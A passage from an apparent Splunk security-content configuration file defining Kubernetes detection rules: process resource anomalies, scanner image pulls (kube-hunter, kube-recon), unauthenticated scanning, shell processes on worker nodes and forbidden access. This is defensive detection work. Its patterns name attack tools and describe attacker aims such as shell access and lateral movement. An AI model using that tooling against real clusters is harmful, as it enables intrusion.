"host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Process with Anomalous Resource Utilisation - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.*) as process.* where `kubernetes_metrics` by host.name k8s.cluster.name k8s.node.name process.executable.name span=10s | eval key = 'k8s.cluster.name' + ":" + 'host.name' + ":" + 'process.executable.name' | lookup k8s_process_resource_baseline key | fillnull | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by host.name k8s.cluster.name k8s.node.name process.executable.name | sort - count | where count > 5 | rename host.name as host | `kubernetes_process_with_anomalous_resource_utilisation_filter` [ESCU - Kubernetes Process with Resource Ratio Anomalies - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects anomalously changes in the ratio between specific process resources on a Kubernetes node, based on the past behavior for each process running in the Kubernetes scope on that node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection also leverages a lookup table that contains average and standard deviation for the cpu:disk operations, cpu:mem, cpu:thread count, disk operations:thread count, and mem:disk operations ratios. This is used to indicate an anomalous change in resource ratios that indicate the workload has changed behavior irrespective of load. Changes in the relationship between utilization of different resources can indicate a change in behavior of the monitored process, which can indicate a potentially compromised application. Deviations in resource ratios, such as memory-to-CPU or CPU-to-disk utilization, may signify compromised processes, malicious activity, or misconfigurations that could pose risks. A change in process behavior could signify a potential security breach within the Kubernetes environment, where an attacker may have compromised a process either on the node or running within a container. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects anomalously changes in the ratio between specific process resources on a Kubernetes node, based on the past behavior for each process running in the Kubernetes scope on that node. This detection leverages process metrics harvested using an OTEL collector and hostmetrics receiver, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection also leverages a lookup table that contains average and standard deviation for the cpu:disk operations, cpu:mem, cpu:thread count, disk operations:thread count, and mem:disk operations ratios. This is used to indicate an anomalous change in resource ratios that indicate the workload has changed behavior irrespective of load. Changes in the relationship between utilization of different resources can indicate a change in behavior of the monitored process, which can indicate a potentially compromised application. Deviations in resource ratios, such as memory-to-CPU or CPU-to-disk utilization, may signify compromised processes, malicious activity, or misconfigurations that could pose risks. A change in process behavior could signify a potential security breach within the Kubernetes environment, where an attacker may have compromised a process either on the node or running within a container. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Process with Resource Ratio Anomalies - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Process with Resource Ratio Anomalies on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Process with Resource Ratio Anomalies - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.*) as process.* where `kubernetes_metrics` by host.name k8s.cluster.name k8s.node.name process.executable.name span=10s | eval cpu:mem = 'process.cpu.utilization'/'process.memory.utilization' | eval cpu:disk = 'process.cpu.utilization'/'process.disk.operations' | eval mem:disk = 'process.memory.utilization'/'process.disk.operations' | eval cpu:threads = 'process.cpu.utilization'/'process.threads' | eval disk:threads = 'process.disk.operations'/'process.threads' | eval key = 'k8s.cluster.name' + ":" + 'host.name' + ":" + 'process.executable.name' | lookup k8s_process_resource_ratio_baseline key | fillnull | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> ratio higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by host.name k8s.cluster.name k8s.node.name process.executable.name | where count > 5 | rename host.name as host | `kubernetes_process_with_resource_ratio_anomalies_filter` [ESCU - Kubernetes Scanner Image Pulling - Rule] action.escu = 0 action.escu.enabled = 1 description = This search uses the Kubernetes logs from Splunk Connect from Kubernetes to detect Kubernetes Security Scanner. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search uses the Kubernetes logs from Splunk Connect from Kubernetes to detect Kubernetes Security Scanner. action.escu.how_to_implement = You must ingest Kubernetes logs through Splunk Connect for Kubernetes. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Scanner Image Pulling - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Kubernetes Scanner image pulled on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Scanner Image Pulling - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search uses the Kubernetes logs from Splunk Connect from Kubernetes to detect Kubernetes Security Scanner. action.notable.param.rule_title = Kubernetes Scanner Image Pulling action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_objects_events` object.message IN ("Pulling image *kube-hunter*", "Pulling image *kube-bench*", "Pulling image *kube-recon*", "Pulling image *kube-recon*") | rename object.* AS * | rename involvedObject.* AS * | rename source.host AS host | eval phase="operate" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime count by host, name, namespace, kind, reason, message, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kubernetes_scanner_image_pulling_filter` [ESCU - Kubernetes Scanning by Unauthenticated IP Address - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection rule is designed to identify potential scanning activities within a Kubernetes environment. Scanning is a common preliminary step in an attack, where the attacker tries to gather information about the system to find potential vulnerabilities. In the context of Kubernetes, scanning could involve activities like unauthorized access attempts, probing public APIs, or trying to exploit known vulnerabilities. This rule triggers an alert when such suspicious activities are detected, helping to ensure the security of your Kubernetes infrastructure. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection rule is designed to identify potential scanning activities within a Kubernetes environment. Scanning is a common preliminary step in an attack, where the attacker tries to gather information about the system to find potential vulnerabilities. In the context of Kubernetes, scanning could involve activities like unauthorized access attempts, probing public APIs, or trying to exploit known vulnerabilities. This rule triggers an alert when such suspicious activities are detected, helping to ensure the security of your Kubernetes infrastructure. action.escu.how_to_implement = You must ingest Kubernetes audit logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Scanning by Unauthenticated IP Address - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes scanning from ip $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Scanning by Unauthenticated IP Address - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "user.groups{}"="system:unauthenticated" "responseStatus.code"=403 | iplocation sourceIPs{} | stats count values(userAgent) as userAgent values(user.username) as user.username values(user.groups{}) as user.groups{} values(verb) as verb values(requestURI) as requestURI values(responseStatus.code) as responseStatus.code values(responseStatus.message) as responseStatus.message values(responseStatus.reason) as responseStatus.reason values(responseStatus.status) as responseStatus.status by sourceIPs{} Country City | where count > 5 | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_scanning_by_unauthenticated_ip_address_filter` [ESCU - Kubernetes Shell Running on Worker Node - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies shell activity within the Kubernetes privilege scope on a worker node, returning a list of shell processes regardless of CPU resource consumption. It uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. Metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized or suspicious activity, posing a security threat. Shell access to worker nodes can provide attackers an entry point to compromise the node and the entire Kubernetes cluster. Monitoring and detecting shell processes is crucial for anomaly identification, security policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node can severely compromise the cluster's security and integrity. Such access can lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. It may also enable attackers to manipulate configurations, deploy malicious containers, and execute arbitrary code, posing a severe risk to the confidentiality, availability, and integrity of applications and sensitive data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies shell activity within the Kubernetes privilege scope on a worker node, returning a list of shell processes regardless of CPU resource consumption. It uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. Metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized or suspicious activity, posing a security threat. Shell access to worker nodes can provide attackers an entry point to compromise the node and the entire Kubernetes cluster. Monitoring and detecting shell processes is crucial for anomaly identification, security policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node can severely compromise the cluster's security and integrity. Such access can lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. It may also enable attackers to manipulate configurations, deploy malicious containers, and execute arbitrary code, posing a severe risk to the confidentiality, availability, and integrity of applications and sensitive data. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Shell Running on Worker Node - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes shell running on worker node on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Shell Running on Worker Node - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization where `kubernetes_metrics` AND process.executable.name IN ("sh","bash","csh", "tcsh") by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name span=10s | search process.cpu.utilization>0 OR process.memory.utilization>0 | stats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name | rename host.name as host | `kubernetes_shell_running_on_worker_node_filter` [ESCU - Kubernetes Shell Running on Worker Node with CPU Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies shell activity within the Kubernetes privilege scope on a worker node. It returns shell processes only if they're consuming CPU resources. The detection uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized activity, posing a security threat. Attackers could compromise the node and the entire Kubernetes cluster via shell access to worker nodes. Monitoring shell processes is crucial for anomaly detection, policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node could severely impact the cluster's security and integrity. Attackers could gain full control over the host's resources and file system, compromising all hosted workloads and data. This access could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. Attackers could also manipulate configurations, deploy malicious containers, and execute arbitrary code, severely risking the confidentiality, availability, and integrity of applications and sensitive data. A rapid and comprehensive incident response is required to mitigate and recover from such a breach. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies shell activity within the Kubernetes privilege scope on a worker node. It returns shell processes only if they're consuming CPU resources. The detection uses process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. The metrics used are process.cpu.utilization and process.memory.utilization. Shell processes can indicate unauthorized activity, posing a security threat. Attackers could compromise the node and the entire Kubernetes cluster via shell access to worker nodes. Monitoring shell processes is crucial for anomaly detection, policy enforcement, and breach mitigation. Unauthorized shell processes on a Kubernetes worker node could severely impact the cluster's security and integrity. Attackers could gain full control over the host's resources and file system, compromising all hosted workloads and data. This access could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks within the cluster. Attackers could also manipulate configurations, deploy malicious containers, and execute arbitrary code, severely risking the confidentiality, availability, and integrity of applications and sensitive data. A rapid and comprehensive incident response is required to mitigate and recover from such a breach. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically Process.cpu.utilization and process.memory.utilization, are enabled.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics. Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-18 action.escu.modification_date = 2023-12-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Shell Running on Worker Node with CPU Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes shell with cpu activity running on worker node on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Shell Running on Worker Node with CPU Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization where `kubernetes_metrics` AND process.executable.name IN ("sh","bash","csh", "tcsh") by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name span=10s | search process.cpu.utilization>0 | stats avg(process.cpu.utilization) as process.cpu.utilization avg(process.memory.utilization) as process.memory.utilization by host.name k8s.cluster.name k8s.node.name process.pid process.executable.name | rename host.name as host | `kubernetes_shell_running_on_worker_node_with_cpu_activity_filter` [ESCU - Kubernetes Suspicious Image Pulling - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects instances of suspicious image pulling in Kubernetes. It identifies this behavior by monitoring Kubernetes audit logs for image pull requests that do not match a predefined list of allowed images. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to deploy malicious software or infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects instances of suspicious image pulling in Kubernetes. It identifies this behavior by monitoring Kubernetes audit logs for image pull requests that do not match a predefined list of allowed images. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to deploy malicious software or infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Suspicious Image Pulling - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Suspicious image $objectRef.name$ pulled in Kubernetes from ip $src_ip$ by user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Suspicious Image Pulling - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` requestObject.message="Pulling image*" | search NOT `kube_allowed_images` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_suspicious_image_pulling_filter` [ESCU - Kubernetes Unauthorized Access - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access to Kubernetes by monitoring Kubernetes audit logs. It identifies anomalies in access patterns by segmenting and analyzing the source of requests. Unauthorized access is worth identifying for a SOC as it could indicate an attacker attempting to infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access to Kubernetes by monitoring Kubernetes audit logs. It identifies anomalies in access patterns by segmenting and analyzing the source of requests. Unauthorized access is worth identifying for a SOC as it could indicate an attacker attempting to infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Unauthorized Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Unauthorized access to Kubernetes from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Unauthorized Access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` verb=create responseStatus.reason=Forbidden | fillnull | stats count by objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code responseStatus.message sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_unauthorized_access_filter` [ESCU - O365 Add App Role Assignment Grant User - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is designed to detect the creation of a new Federation setting by alerting on a specific event associated with its creation. By monitoring for this event, the search can identify any instances where a Federation setting is being created within the system. This can help in detecting and monitoring any unauthorized or suspicious changes to the Federation settings, providing an additional layer of security for your environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is designed to detect the creation of a new Federation setting by alerting on a specific event associated with its creation. By monitoring for this event, the search can identify any instances where a Federation setting is being created within the system. This can help in detecting and monitoring any unauthorized or suspicious changes to the Federation settings, providing an additional layer of security for your environment. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = The creation of a new Federation is not necessarily malicious, however this events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a different cloud provider. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Add App Role Assignment Grant User - Rule action.escu.search_type = detection action.escu.product = 